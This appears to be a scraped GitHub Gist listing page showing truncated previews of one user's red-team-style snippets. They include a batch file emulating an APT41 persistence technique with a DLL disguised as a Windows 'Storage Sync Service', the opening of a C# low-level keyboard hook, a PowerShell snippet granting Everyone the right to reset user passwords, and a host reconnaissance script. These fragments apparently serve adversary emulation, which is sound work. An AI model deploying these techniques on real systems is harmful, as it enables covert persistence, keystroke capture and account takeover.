2XXE (SRA) 2XXE-SRA
2XXE-SRA
/ install.bat
Created
April 26, 2022 13:49
APT41 service creation via registry (source: https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @echo off | |
| set "WORK_DIR=C:\Windows\System32" | |
| set "DLL_NAME=storesyncsvc.dll" | |
| set "SERVICE_NAME=StorSyncSvc" | |
| set "DISPLAY_NAME=Storage Sync Service" | |
| set "DESCRIPTION=The Storage Sync Service is the top-level resource for File Sync. It creates sync relationships with multiple storage accounts via multiple sync groups. If this service is stopped or disabled, applications will be unable to run collectly." | |
| sc stop %SERVICE_NAME% | |
| sc delete %SERVICE_NAME% | |
| mkdir %WORK_DIR% | |
| copy "%~dp0%DLL_NAME%" "%WORK_DIR%" /Y |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Windows.Forms; | |
| using System.Runtime.InteropServices; | |
| using System.IO; | |
| class InterceptKeys | |
| { | |
| private const int WH_KEYBOARD_LL = 13; | |
| private const int WM_KEYDOWN = 0x0100; |
2XXE-SRA
/ removeace.ps1
Last active
June 29, 2022 19:51
Example removal of an ACE via PowerShell ADSI
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # get SID for "Everyone" principal | |
| $sid = [Security.Principal.securityidentifier]::new([System.Security.Principal.WellKnownSidType]::WorldSid, $null) | |
| $everyone = $sid.Translate([security.principal.ntaccount]) | |
| # change user password permissions | |
| $adRight=[DirectoryServices.ActiveDirectoryRights]"ExtendedRight" | |
| $pguid = new-object GUID "ab721a53-1e2f-11d0-9819-00aa0040529b" # refer to https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/1522b774-6464-41a3-87a5-1e5633c3fbbb | |
| # craft an ACE that grants "Everyone" "Allow" for changing user password | |
| $accessRuleArgs = $everyone,$adRight,"Allow",$pguid,"None" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import json | |
| import docker | |
| import os | |
| import boto3 | |
| import subprocess | |
| TARGET_INSTANCE = "<instance ID>" | |
| LOCAL_PORT = "9999" | |
| REGION = "us-east-1" | |
| PROFILE = "default" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| df -aH | |
| ip addr | |
| netstat -tulpn | |
| ps -aux | |
| who -a | |
| systemctl list-units --type=service --no-pager | |
| service --status-all | |
| apt list --installed |
OlderNewer